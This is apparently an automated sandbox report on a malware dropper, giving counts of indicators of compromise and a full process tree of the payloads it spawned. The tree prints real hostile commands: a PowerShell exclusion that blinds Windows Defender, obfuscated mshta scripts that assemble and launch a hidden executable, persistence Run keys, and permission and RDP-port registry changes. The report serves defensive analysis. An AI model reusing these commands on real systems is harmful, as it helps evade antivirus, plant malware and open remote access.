1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
1228	Process not Found
2836	WerFault.exe
3012	WerFault.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
464	Process not Found
1684	Process not Found
1684	Process not Found
1684	Process not Found
1684	Process not Found
1684	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1028	conhost.exe
456	rvgdwch

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeAssignPrimaryTokenPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeLockMemoryPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeIncreaseQuotaPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeMachineAccountPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeTcbPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeSecurityPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeTakeOwnershipPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeLoadDriverPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeSystemProfilePrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeSystemtimePrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeProfSingleProcessPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeIncBasePriorityPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeCreatePagefilePrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeCreatePermanentPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeBackupPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeRestorePrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeShutdownPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeDebugPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeAuditPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeSystemEnvironmentPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeChangeNotifyPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeRemoteShutdownPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeUndockPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeSyncAgentPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeEnableDelegationPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeManageVolumePrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeImpersonatePrivilege	788	Thu165bd34b1e1d4d81.exe
Token: SeCreateGlobalPrivilege	788	Thu165bd34b1e1d4d81.exe
Token: 31	788	Thu165bd34b1e1d4d81.exe
Token: 32	788	Thu165bd34b1e1d4d81.exe
Token: 33	788	Thu165bd34b1e1d4d81.exe
Token: 34	788	Thu165bd34b1e1d4d81.exe
Token: 35	788	Thu165bd34b1e1d4d81.exe
Token: SeDebugPrivilege	2072	rundll32.exe
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeDebugPrivilege	316	Thu161580bf75.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeDebugPrivilege	2656	taskkill.exe
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeDebugPrivilege	2836	WerFault.exe
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeDebugPrivilege	2772	net.exe
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeDebugPrivilege	2064	8367519.scr
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeDebugPrivilege	3012	WerFault.exe
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeDebugPrivilege	2880	taskkill.exe
Token: SeDebugPrivilege	572	Thu164ba03be19.exe
Token: SeDebugPrivilege	2936	4358253.scr
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeShutdownPrivilege	1228	Process not Found
Token: SeDebugPrivilege	2068	2664696.scr
Token: SeShutdownPrivilege	1568	Setup.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
1228	Process not Found
1228	Process not Found
2692	Thu16f3de88a335950bb.tmp
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
1228	Process not Found
1228	Process not Found
1228	Process not Found
1228	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 820 wrote to memory of 280	820	setup_x86_x64_install.exe	28
PID 820 wrote to memory of 280	820	setup_x86_x64_install.exe	28
PID 820 wrote to memory of 280	820	setup_x86_x64_install.exe	28
PID 820 wrote to memory of 280	820	setup_x86_x64_install.exe	28
PID 820 wrote to memory of 280	820	setup_x86_x64_install.exe	28
PID 820 wrote to memory of 280	820	setup_x86_x64_install.exe	28
PID 820 wrote to memory of 280	820	setup_x86_x64_install.exe	28
PID 280 wrote to memory of 588	280	setup_installer.exe	29
PID 280 wrote to memory of 588	280	setup_installer.exe	29
PID 280 wrote to memory of 588	280	setup_installer.exe	29
PID 280 wrote to memory of 588	280	setup_installer.exe	29
PID 280 wrote to memory of 588	280	setup_installer.exe	29
PID 280 wrote to memory of 588	280	setup_installer.exe	29
PID 280 wrote to memory of 588	280	setup_installer.exe	29
PID 588 wrote to memory of 1820	588	setup_install.exe	36
PID 588 wrote to memory of 1820	588	setup_install.exe	36
PID 588 wrote to memory of 1820	588	setup_install.exe	36
PID 588 wrote to memory of 1820	588	setup_install.exe	36
PID 588 wrote to memory of 1820	588	setup_install.exe	36
PID 588 wrote to memory of 1820	588	setup_install.exe	36
PID 588 wrote to memory of 1820	588	setup_install.exe	36
PID 588 wrote to memory of 1556	588	setup_install.exe	31
PID 588 wrote to memory of 1556	588	setup_install.exe	31
PID 588 wrote to memory of 1556	588	setup_install.exe	31
PID 588 wrote to memory of 1556	588	setup_install.exe	31
PID 588 wrote to memory of 1556	588	setup_install.exe	31
PID 588 wrote to memory of 1556	588	setup_install.exe	31
PID 588 wrote to memory of 1556	588	setup_install.exe	31
PID 588 wrote to memory of 1420	588	setup_install.exe	32
PID 588 wrote to memory of 1420	588	setup_install.exe	32
PID 588 wrote to memory of 1420	588	setup_install.exe	32
PID 588 wrote to memory of 1420	588	setup_install.exe	32
PID 588 wrote to memory of 1420	588	setup_install.exe	32
PID 588 wrote to memory of 1420	588	setup_install.exe	32
PID 588 wrote to memory of 1420	588	setup_install.exe	32
PID 588 wrote to memory of 1272	588	setup_install.exe	33
PID 588 wrote to memory of 1272	588	setup_install.exe	33
PID 588 wrote to memory of 1272	588	setup_install.exe	33
PID 588 wrote to memory of 1272	588	setup_install.exe	33
PID 588 wrote to memory of 1272	588	setup_install.exe	33
PID 588 wrote to memory of 1272	588	setup_install.exe	33
PID 588 wrote to memory of 1272	588	setup_install.exe	33
PID 588 wrote to memory of 1216	588	setup_install.exe	34
PID 588 wrote to memory of 1216	588	setup_install.exe	34
PID 588 wrote to memory of 1216	588	setup_install.exe	34
PID 588 wrote to memory of 1216	588	setup_install.exe	34
PID 588 wrote to memory of 1216	588	setup_install.exe	34
PID 588 wrote to memory of 1216	588	setup_install.exe	34
PID 588 wrote to memory of 1216	588	setup_install.exe	34
PID 588 wrote to memory of 792	588	setup_install.exe	35
PID 588 wrote to memory of 792	588	setup_install.exe	35
PID 588 wrote to memory of 792	588	setup_install.exe	35
PID 588 wrote to memory of 792	588	setup_install.exe	35
PID 588 wrote to memory of 792	588	setup_install.exe	35
PID 588 wrote to memory of 792	588	setup_install.exe	35
PID 588 wrote to memory of 792	588	setup_install.exe	35
PID 588 wrote to memory of 320	588	setup_install.exe	37
PID 588 wrote to memory of 320	588	setup_install.exe	37
PID 588 wrote to memory of 320	588	setup_install.exe	37
PID 588 wrote to memory of 320	588	setup_install.exe	37
PID 588 wrote to memory of 320	588	setup_install.exe	37
PID 588 wrote to memory of 320	588	setup_install.exe	37
PID 588 wrote to memory of 320	588	setup_install.exe	37
PID 588 wrote to memory of 1340	588	setup_install.exe	39

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:820
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:280
- - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS811E9916\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:588
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe
      4⤵
      Loads dropped DLL
      PID:1556
    - - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu166f9a8bbe80.exe
        
        Thu166f9a8bbe80.exe
        5⤵
        Executes dropped EXE
        Checks computer location settings
        Loads dropped DLL
        
        PID:1020
      - C:\Users\Admin\Pictures\Adobe Films\Yx48_d5ayCh4UmZgDHivc0dS.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\Yx48_d5ayCh4UmZgDHivc0dS.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1420
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1020 -s 1636
        6⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:3012
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone
      4⤵
      PID:1420
    - - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu16205451b994.exe
        
        Thu16205451b994.exe /mixone
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1876
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Thu16205451b994.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu16205451b994.exe" & exit
        6⤵
        
        PID:2584
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Thu16205451b994.exe" /f
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2656
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu161580bf75.exe
      4⤵
      Loads dropped DLL
      PID:1272
    - - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu161580bf75.exe
        
        Thu161580bf75.exe
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:316
      - C:\Users\Admin\AppData\Roaming\5067537.scr
        
        "C:\Users\Admin\AppData\Roaming\5067537.scr" /S
        6⤵
        
        PID:2772
      - C:\Users\Admin\AppData\Roaming\5380584.scr
        
        "C:\Users\Admin\AppData\Roaming\5380584.scr" /S
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:2868
        
        C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
        
        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
        7⤵
        Executes dropped EXE
        
        PID:2472
      - C:\Users\Admin\AppData\Roaming\4358253.scr
        
        "C:\Users\Admin\AppData\Roaming\4358253.scr" /S
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        
        PID:2936
      - C:\Users\Admin\AppData\Roaming\2664696.scr
        
        "C:\Users\Admin\AppData\Roaming\2664696.scr" /S
        6⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        
        PID:2068
      - C:\Users\Admin\AppData\Roaming\5376642.scr
        
        "C:\Users\Admin\AppData\Roaming\5376642.scr" /S
        6⤵
        Executes dropped EXE
        
        PID:2204
      - C:\Users\Admin\AppData\Roaming\8367519.scr
        
        "C:\Users\Admin\AppData\Roaming\8367519.scr" /S
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2064
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe
      4⤵
      Loads dropped DLL
      PID:1216
    - - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu1628aafb3efd7c3d.exe
        
        Thu1628aafb3efd7c3d.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1756
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 956
        6⤵
        Program crash
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of AdjustPrivilegeToken
        
        PID:2836
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe
      4⤵
      Loads dropped DLL
      PID:792
    - - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu165bd34b1e1d4d81.exe
        
        Thu165bd34b1e1d4d81.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Modifies system certificate store
        Suspicious use of AdjustPrivilegeToken
        
        PID:788
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:2628
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2880
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      PID:1820
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe
      4⤵
      Loads dropped DLL
      PID:320
    - - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu16466b26f8b7.exe
        
        Thu16466b26f8b7.exe
        5⤵
        
        PID:1028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe
      4⤵
      Loads dropped DLL
      PID:1340
    - - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu16f584bd3686.exe
        
        Thu16f584bd3686.exe
        5⤵
        Executes dropped EXE
        
        PID:1104
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe
      4⤵
      Loads dropped DLL
      PID:376
    - - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu16f3de88a335950bb.exe
        
        Thu16f3de88a335950bb.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1220
      - C:\Users\Admin\AppData\Local\Temp\is-R5TEL.tmp\Thu16f3de88a335950bb.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-R5TEL.tmp\Thu16f3de88a335950bb.tmp" /SL5="$2018E,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu16f3de88a335950bb.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2568
        
        C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu16f3de88a335950bb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu16f3de88a335950bb.exe" /SILENT
        7⤵
        
        PID:2640
        
        C:\Users\Admin\AppData\Local\Temp\is-3OO14.tmp\Thu16f3de88a335950bb.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-3OO14.tmp\Thu16f3de88a335950bb.tmp" /SL5="$40190,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu16f3de88a335950bb.exe" /SILENT
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:2692
        
        C:\Users\Admin\AppData\Local\Temp\is-KO95G.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-KO95G.tmp\postback.exe" ss1
        9⤵
        Executes dropped EXE
        
        PID:3000
        
        C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe
        
        "C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss1
        9⤵
        Executes dropped EXE
        
        PID:3024
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://dateadult-contacts.com/?u=h2dp605&o=lxw09vh
        10⤵
        
        PID:2648
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2648 CREDAT:275457 /prefetch:2
        11⤵
        
        PID:1060
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2648 CREDAT:537617 /prefetch:2
        11⤵
        Executes dropped EXE
        
        PID:2520
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2648 CREDAT:3879952 /prefetch:2
        11⤵
        
        PID:1028
        
        C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2648 CREDAT:3879976 /prefetch:2
        11⤵
        
        PID:2372
        
        C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe
        
        "C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart
        9⤵
        Executes dropped EXE
        
        PID:3048
        
        C:\428ffdae41a3cb6bcefaaf\Setup.exe
        
        C:\428ffdae41a3cb6bcefaaf\\Setup.exe /q /norestart /x86 /x64 /web
        10⤵
        Executes dropped EXE
        Drops file in System32 directory
        Drops file in Windows directory
        Checks processor information in registry
        Suspicious use of AdjustPrivilegeToken
        
        PID:1568
        
        C:\428ffdae41a3cb6bcefaaf\SetupUtility.exe
        
        SetupUtility.exe /screboot
        11⤵
        
        PID:2528
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe
      4⤵
      Loads dropped DLL
      PID:896
    - - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu1653d94a8da.exe
        
        Thu1653d94a8da.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1380
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu1653d94a8da.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
        6⤵
        
        PID:1368
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu1653d94a8da.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu1653d94a8da.exe") do taskkill /F -Im "%~NxU"
        7⤵
        Loads dropped DLL
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\09xU.exE
        
        09xU.EXE -pPtzyIkqLZoCarb5ew
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2060
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
        9⤵
        
        PID:2140
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"
        10⤵
        
        PID:2196
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )
        9⤵
        
        PID:2280
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
        10⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" eCHO "
        11⤵
        
        PID:2396
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
        11⤵
        
        PID:2412
        
        C:\Windows\SysWOW64\control.exe
        
        control .\R6f7sE.I
        11⤵
        
        PID:2432
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
        12⤵
        Loads dropped DLL
        
        PID:2464
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I
        13⤵
        
        PID:2344
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
        14⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2072
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F -Im "Thu1653d94a8da.exe"
        8⤵
        Kills process with taskkill
        
        PID:2072
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe
      4⤵
      Loads dropped DLL
      PID:1748
    - - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu167d514d2a7ac5a.exe
        
        Thu167d514d2a7ac5a.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:524
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu164ba03be19.exe
      4⤵
      Loads dropped DLL
      PID:1224
    - - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu164ba03be19.exe
        
        Thu164ba03be19.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:1940
      - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu164ba03be19.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu164ba03be19.exe
        6⤵
        Executes dropped EXE
        
        PID:2352
      - C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu164ba03be19.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS811E9916\Thu164ba03be19.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:572

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-17066984061495906960314107719-17187057713008646241815263577-15351434311467221507"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1028

C:\Users\Admin\AppData\Local\Temp\EA6E.exe
C:\Users\Admin\AppData\Local\Temp\EA6E.exe
1⤵
PID:2240

C:\Windows\system32\taskeng.exe
taskeng.exe {334A0037-5B30-447D-ABAE-88DEDBA23ACB} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2380
- C:\Users\Admin\AppData\Roaming\rvgdwch
  C:\Users\Admin\AppData\Roaming\rvgdwch
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:456

C:\Users\Admin\AppData\Local\Temp\6F28.exe
C:\Users\Admin\AppData\Local\Temp\6F28.exe
1⤵
- Executes dropped EXE
PID:2348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Deletes itself
  - Drops file in System32 directory
  PID:2532
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a_dspst5.cmdline"
    3⤵
    PID:544
  - - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1FC1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1FB1.tmp"
      4⤵
      PID:2228
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    PID:1668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    PID:804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
    3⤵
    PID:1604
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2680
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2588
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:980
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:996
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2356
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:944
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1760
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1036
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:1784
- - C:\Windows\system32\reg.exe
